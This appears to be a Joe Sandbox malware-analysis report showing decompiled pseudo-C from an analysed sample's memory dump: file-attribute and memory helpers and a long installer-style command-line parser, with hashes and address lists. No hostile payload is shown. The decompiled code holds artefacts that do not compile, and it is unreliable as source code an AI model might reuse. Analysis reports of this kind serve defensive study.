                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2591292051-0
                                                                                                                                                                                                                                              • Opcode ID: 754844c900644531640fcfb342a18f226a2f6362670e1f85c515d678f95cd6bc
                                                                                                                                                                                                                                              • Instruction ID: af546c56c5fcae7dcba4a4836ef6d6ac42dda4c28be13aebb98ecf3053371910
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 754844c900644531640fcfb342a18f226a2f6362670e1f85c515d678f95cd6bc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68F01C35910B089FC7719FBACC00653BFE4BBE7365710093E946ED2194EB70A851CBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A66AE(CHAR* __ecx) {
                                                                                                                                                                                                                                              				unsigned int _t1;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                                                              				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                                                              					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}





                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(?,001A4777,?,001A4E38,?), ref: 001A66B1
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                                              • Opcode ID: 0fdfc24038b1230f9b9bae8912da6dc9079c7ccdcd34e868eb117b3b571bc1b4
                                                                                                                                                                                                                                              • Instruction ID: 66209d9fc506924ae8c95ce698327f437566a32d6cac17c5b6cbcc9198cf1774
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fdfc24038b1230f9b9bae8912da6dc9079c7ccdcd34e868eb117b3b571bc1b4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADB0927A262840426A6006316C295562841ABC263A7E81B90F036C05E0CB3EC886D004
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A4CA0(long _a4) {
                                                                                                                                                                                                                                              				void* _t2;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                                                              				return _t2;
                                                                                                                                                                                                                                              			}





                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000000,?), ref: 001A4CAA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocGlobal
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3761449716-0
                                                                                                                                                                                                                                              • Opcode ID: 98601e680f2f83fcb72645e197cf4d384677cafb4c77a2f5a31de0aa101acfd7
                                                                                                                                                                                                                                              • Instruction ID: fece3f1fef98cf371d56abfb5dc461f42019241ca066ceee53eaccebfa0672d8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98601e680f2f83fcb72645e197cf4d384677cafb4c77a2f5a31de0aa101acfd7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08B0123204420CB7CF411FC2EC09F853F1DEBC9761F540000F60C454508B729450C796
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A4CC0(void* _a4) {
                                                                                                                                                                                                                                              				void* _t2;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                                                              				return _t2;
                                                                                                                                                                                                                                              			}




                                                                                                                                                                                                                                              0x001a4cc8
                                                                                                                                                                                                                                              0x001a4ccf

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeGlobal
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2979337801-0
                                                                                                                                                                                                                                              • Opcode ID: cdaa7c3ae781d66f1a82f5b2afce94bd7d09beb0e238c85a6b32ad631f0aaa32
                                                                                                                                                                                                                                              • Instruction ID: 3955ec382897b01c9d454f0df65ff261109e7775fc0431fd87d86a076e06391e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cdaa7c3ae781d66f1a82f5b2afce94bd7d09beb0e238c85a6b32ad631f0aaa32
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19B0123100010CB78F011B52ED088453F1DDBC52607400010F50C414218B339851C585
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                                                                                                              			E001A5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                                                                              				CHAR* _v265;
                                                                                                                                                                                                                                              				char _v266;
                                                                                                                                                                                                                                              				char _v267;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				CHAR* _v272;
                                                                                                                                                                                                                                              				char _v276;
                                                                                                                                                                                                                                              				signed int _v296;
                                                                                                                                                                                                                                              				char _v556;
                                                                                                                                                                                                                                              				signed int _t61;
                                                                                                                                                                                                                                              				int _t63;
                                                                                                                                                                                                                                              				char _t67;
                                                                                                                                                                                                                                              				CHAR* _t69;
                                                                                                                                                                                                                                              				signed int _t71;
                                                                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                                                                              				char _t79;
                                                                                                                                                                                                                                              				void* _t83;
                                                                                                                                                                                                                                              				void* _t85;
                                                                                                                                                                                                                                              				void* _t87;
                                                                                                                                                                                                                                              				intOrPtr _t88;
                                                                                                                                                                                                                                              				void* _t100;
                                                                                                                                                                                                                                              				intOrPtr _t101;
                                                                                                                                                                                                                                              				CHAR* _t104;
                                                                                                                                                                                                                                              				intOrPtr _t105;
                                                                                                                                                                                                                                              				void* _t111;
                                                                                                                                                                                                                                              				void* _t115;
                                                                                                                                                                                                                                              				CHAR* _t118;
                                                                                                                                                                                                                                              				void* _t119;
                                                                                                                                                                                                                                              				void* _t127;
                                                                                                                                                                                                                                              				CHAR* _t129;
                                                                                                                                                                                                                                              				void* _t132;
                                                                                                                                                                                                                                              				void* _t142;
                                                                                                                                                                                                                                              				signed int _t143;
                                                                                                                                                                                                                                              				CHAR* _t144;
                                                                                                                                                                                                                                              				void* _t145;
                                                                                                                                                                                                                                              				void* _t146;
                                                                                                                                                                                                                                              				void* _t147;
                                                                                                                                                                                                                                              				void* _t149;
                                                                                                                                                                                                                                              				char _t155;
                                                                                                                                                                                                                                              				void* _t157;
                                                                                                                                                                                                                                              				void* _t162;
                                                                                                                                                                                                                                              				void* _t163;
                                                                                                                                                                                                                                              				char _t167;
                                                                                                                                                                                                                                              				char _t170;
                                                                                                                                                                                                                                              				CHAR* _t173;
                                                                                                                                                                                                                                              				void* _t177;
                                                                                                                                                                                                                                              				intOrPtr* _t183;
                                                                                                                                                                                                                                              				intOrPtr* _t192;
                                                                                                                                                                                                                                              				CHAR* _t199;
                                                                                                                                                                                                                                              				void* _t200;
                                                                                                                                                                                                                                              				CHAR* _t201;
                                                                                                                                                                                                                                              				void* _t205;
                                                                                                                                                                                                                                              				void* _t206;
                                                                                                                                                                                                                                              				int _t209;
                                                                                                                                                                                                                                              				void* _t210;
                                                                                                                                                                                                                                              				void* _t212;
                                                                                                                                                                                                                                              				void* _t213;
                                                                                                                                                                                                                                              				CHAR* _t218;
                                                                                                                                                                                                                                              				intOrPtr* _t219;
                                                                                                                                                                                                                                              				intOrPtr* _t220;
                                                                                                                                                                                                                                              				signed int _t221;
                                                                                                                                                                                                                                              				signed int _t223;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t173 = __ecx;
                                                                                                                                                                                                                                              				_t61 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                                                                              				_t209 = 1;
                                                                                                                                                                                                                                              				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                                                              					_t63 = 1;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					L2:
                                                                                                                                                                                                                                              					while(_t209 != 0) {
                                                                                                                                                                                                                                              						_t67 =  *_t173;
                                                                                                                                                                                                                                              						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                                                              							_t173 = CharNextA(_t173);
                                                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_v272 = _t173;
                                                                                                                                                                                                                                              						if(_t67 == 0) {
                                                                                                                                                                                                                                              							break;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t69 = _v272;
                                                                                                                                                                                                                                              							_t177 = 0;
                                                                                                                                                                                                                                              							_t213 = 0;
                                                                                                                                                                                                                                              							_t163 = 0;
                                                                                                                                                                                                                                              							_t202 = 1;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								if(_t213 != 0) {
                                                                                                                                                                                                                                              									if(_t163 != 0) {
                                                                                                                                                                                                                                              										break;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										goto L21;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t69 =  *_t69;
                                                                                                                                                                                                                                              									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                              										break;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t69 = _v272;
                                                                                                                                                                                                                                              										L21:
                                                                                                                                                                                                                                              										_t155 =  *_t69;
                                                                                                                                                                                                                                              										if(_t155 != 0x22) {
                                                                                                                                                                                                                                              											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                              												goto L106;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                              												_t177 = _t177 + 1;
                                                                                                                                                                                                                                              												_t202 = _t202 + 1;
                                                                                                                                                                                                                                              												_t157 = 1;
                                                                                                                                                                                                                                              												goto L30;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											if(_v272[1] == 0x22) {
                                                                                                                                                                                                                                              												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                              													L106:
                                                                                                                                                                                                                                              													_t63 = 0;
                                                                                                                                                                                                                                              													L125:
                                                                                                                                                                                                                                              													_pop(_t210);
                                                                                                                                                                                                                                              													_pop(_t212);
                                                                                                                                                                                                                                              													_pop(_t162);
                                                                                                                                                                                                                                              													return E001A6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                              													_t177 = _t177 + 1;
                                                                                                                                                                                                                                              													_t202 = _t202 + 1;
                                                                                                                                                                                                                                              													_t157 = 2;
                                                                                                                                                                                                                                              													goto L30;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t157 = 1;
                                                                                                                                                                                                                                              												if(_t213 != 0) {
                                                                                                                                                                                                                                              													_t163 = 1;
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													_t213 = 1;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												goto L30;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L131;
                                                                                                                                                                                                                                              								L30:
                                                                                                                                                                                                                                              								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                              								_t69 = _v272;
                                                                                                                                                                                                                                              							} while ( *_t69 != 0);
                                                                                                                                                                                                                                              							if(_t177 >= 0x104) {
                                                                                                                                                                                                                                              								E001A6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                                                              								asm("int3");
                                                                                                                                                                                                                                              								_push(_t221);
                                                                                                                                                                                                                                              								_t222 = _t223;
                                                                                                                                                                                                                                              								_t71 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                                                              								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                                                              									0x4f0 = 2;
                                                                                                                                                                                                                                              									_t75 = E001A597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E001A44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                                                              									 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              									_t75 = 0;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								return E001A6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                                                              								if(_t213 == 0) {
                                                                                                                                                                                                                                              									if(_t163 != 0) {
                                                                                                                                                                                                                                              										goto L34;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										goto L40;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									if(_t163 != 0) {
                                                                                                                                                                                                                                              										L40:
                                                                                                                                                                                                                                              										_t79 = _v268;
                                                                                                                                                                                                                                              										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                                                              											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                                                              											if(_t83 == 0) {
                                                                                                                                                                                                                                              												_t202 = 0x521;
                                                                                                                                                                                                                                              												E001A44B9(0, 0x521, 0x1a1140, 0, 0x40, 0);
                                                                                                                                                                                                                                              												_t85 =  *0x1a8588; // 0x0
                                                                                                                                                                                                                                              												if(_t85 != 0) {
                                                                                                                                                                                                                                              													CloseHandle(_t85);
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												ExitProcess(0);
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t87 = _t83 - 4;
                                                                                                                                                                                                                                              											if(_t87 == 0) {
                                                                                                                                                                                                                                              												if(_v266 != 0) {
                                                                                                                                                                                                                                              													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              														goto L49;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                              														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                                                              														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                              														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                              														_t202 = _t50;
                                                                                                                                                                                                                                              														do {
                                                                                                                                                                                                                                              															_t88 =  *_t183;
                                                                                                                                                                                                                                              															_t183 = _t183 + 1;
                                                                                                                                                                                                                                              														} while (_t88 != 0);
                                                                                                                                                                                                                                              														if(_t183 == _t202) {
                                                                                                                                                                                                                                              															goto L49;
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															_t205 = 0x5b;
                                                                                                                                                                                                                                              															if(E001A667F(_t215, _t205) == 0) {
                                                                                                                                                                                                                                              																L115:
                                                                                                                                                                                                                                              																_t206 = 0x5d;
                                                                                                                                                                                                                                              																if(E001A667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E001A5C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E001A1680(0x1a8c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E001A667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E001A667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x1a8a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E001A5C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x1a8b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x1a8a3a;
																}
																E001A1680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E001A658A(_t218, 0x104, 0x1a1140);
																if(E001A31E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x1a8a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x1a8a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x1a8a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x1a8a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
                                                                                                                                                                                                                                              																 *0x1a8a38 = 1;
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              															goto L50;
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															_t132 = _t127 - 1;
                                                                                                                                                                                                                                              															if(_t132 == 0) {
                                                                                                                                                                                                                                              																if(_v266 != 0) {
                                                                                                                                                                                                                                              																	if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                                                              																			goto L49;
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		_t201 = _v265;
                                                                                                                                                                                                                                              																		 *0x1a9a2c = 1;
                                                                                                                                                                                                                                              																		if(_t201 != 0) {
                                                                                                                                                                                                                                              																			_t220 =  &_v265;
                                                                                                                                                                                                                                              																			do {
                                                                                                                                                                                                                                              																				_t220 = _t220 + 1;
                                                                                                                                                                                                                                              																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                                                              																				if(_t142 == 0) {
                                                                                                                                                                                                                                              																					_t143 = 2;
                                                                                                                                                                                                                                              																					 *0x1a9a2c =  *0x1a9a2c | _t143;
                                                                                                                                                                                                                                              																					goto L70;
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t145 = _t142 - 3;
                                                                                                                                                                                                                                              																					if(_t145 == 0) {
                                                                                                                                                                                                                                              																						 *0x1a8d48 =  *0x1a8d48 | 0x00000040;
                                                                                                                                                                                                                                              																					} else {
                                                                                                                                                                                                                                              																						_t146 = _t145 - 5;
                                                                                                                                                                                                                                              																						if(_t146 == 0) {
                                                                                                                                                                                                                                              																							 *0x1a9a2c =  *0x1a9a2c & 0xfffffffd;
                                                                                                                                                                                                                                              																							goto L70;
                                                                                                                                                                                                                                              																						} else {
                                                                                                                                                                                                                                              																							_t147 = _t146 - 5;
                                                                                                                                                                                                                                              																							if(_t147 == 0) {
                                                                                                                                                                                                                                              																								 *0x1a9a2c =  *0x1a9a2c & 0xfffffffe;
                                                                                                                                                                                                                                              																								goto L70;
                                                                                                                                                                                                                                              																							} else {
                                                                                                                                                                                                                                              																								_t149 = _t147;
                                                                                                                                                                                                                                              																								if(_t149 == 0) {
                                                                                                                                                                                                                                              																									 *0x1a8d48 =  *0x1a8d48 | 0x00000080;
                                                                                                                                                                                                                                              																								} else {
                                                                                                                                                                                                                                              																									if(_t149 == 3) {
                                                                                                                                                                                                                                              																										 *0x1a9a2c =  *0x1a9a2c | 0x00000004;
                                                                                                                                                                                                                                              																										L70:
                                                                                                                                                                                                                                              																										 *0x1a8a28 = 1;
                                                                                                                                                                                                                                              																									} else {
                                                                                                                                                                                                                                              																										_t209 = 0;
                                                                                                                                                                                                                                              																									}
                                                                                                                                                                                                                                              																								}
                                                                                                                                                                                                                                              																							}
                                                                                                                                                                                                                                              																						}
                                                                                                                                                                                                                                              																					}
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																				_t144 =  *_t220;
                                                                                                                                                                                                                                              																				_t201 = _t144;
                                                                                                                                                                                                                                              																			} while (_t144 != 0);
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	 *0x1a9a2c = 3;
                                                                                                                                                                                                                                              																	 *0x1a8a28 = 1;
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              																goto L50;
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																if(_t132 == 0) {
                                                                                                                                                                                                                                              																	goto L98;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	L49:
                                                                                                                                                                                                                                              																	_t209 = 0;
                                                                                                                                                                                                                                              																	L50:
                                                                                                                                                                                                                                              																	_t173 = _v272;
                                                                                                                                                                                                                                              																	if( *_t173 != 0) {
                                                                                                                                                                                                                                              																		goto L2;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		break;
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L106;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										L34:
                                                                                                                                                                                                                                              										_t209 = 0;
                                                                                                                                                                                                                                              										break;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L131;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if( *0x1a8a2c != 0 &&  *0x1a8b3e == 0) {
                                                                                                                                                                                                                                              						if(GetModuleFileNameA( *0x1a9a3c, 0x1a8b3e, 0x104) == 0) {
                                                                                                                                                                                                                                              							_t209 = 0;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t202 = 0x5c;
                                                                                                                                                                                                                                              							 *((char*)(E001A66C8(0x1a8b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t63 = _t209;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				L131:
                                                                                                                                                                                                                                              			}

                                                                                                                                                                                                                                              0x001a5cd7
                                                                                                                                                                                                                                              0x001a5cf4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5cf4
                                                                                                                                                                                                                                              0x001a5cf8
                                                                                                                                                                                                                                              0x001a5d00
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5d06
                                                                                                                                                                                                                                              0x001a5d06
                                                                                                                                                                                                                                              0x001a5d0e
                                                                                                                                                                                                                                              0x001a5d10
                                                                                                                                                                                                                                              0x001a5d12
                                                                                                                                                                                                                                              0x001a5d14
                                                                                                                                                                                                                                              0x001a5d15
                                                                                                                                                                                                                                              0x001a5d17
                                                                                                                                                                                                                                              0x001a5d49
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5d19
                                                                                                                                                                                                                                              0x001a5d19
                                                                                                                                                                                                                                              0x001a5d1d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5d3f
                                                                                                                                                                                                                                              0x001a5d3f
                                                                                                                                                                                                                                              0x001a5d4b
                                                                                                                                                                                                                                              0x001a5d4b
                                                                                                                                                                                                                                              0x001a5d4f
                                                                                                                                                                                                                                              0x001a5d8d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5d93
                                                                                                                                                                                                                                              0x001a5d93
                                                                                                                                                                                                                                              0x001a5d9a
                                                                                                                                                                                                                                              0x001a5d9d
                                                                                                                                                                                                                                              0x001a5d9e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5d9e
                                                                                                                                                                                                                                              0x001a5d51
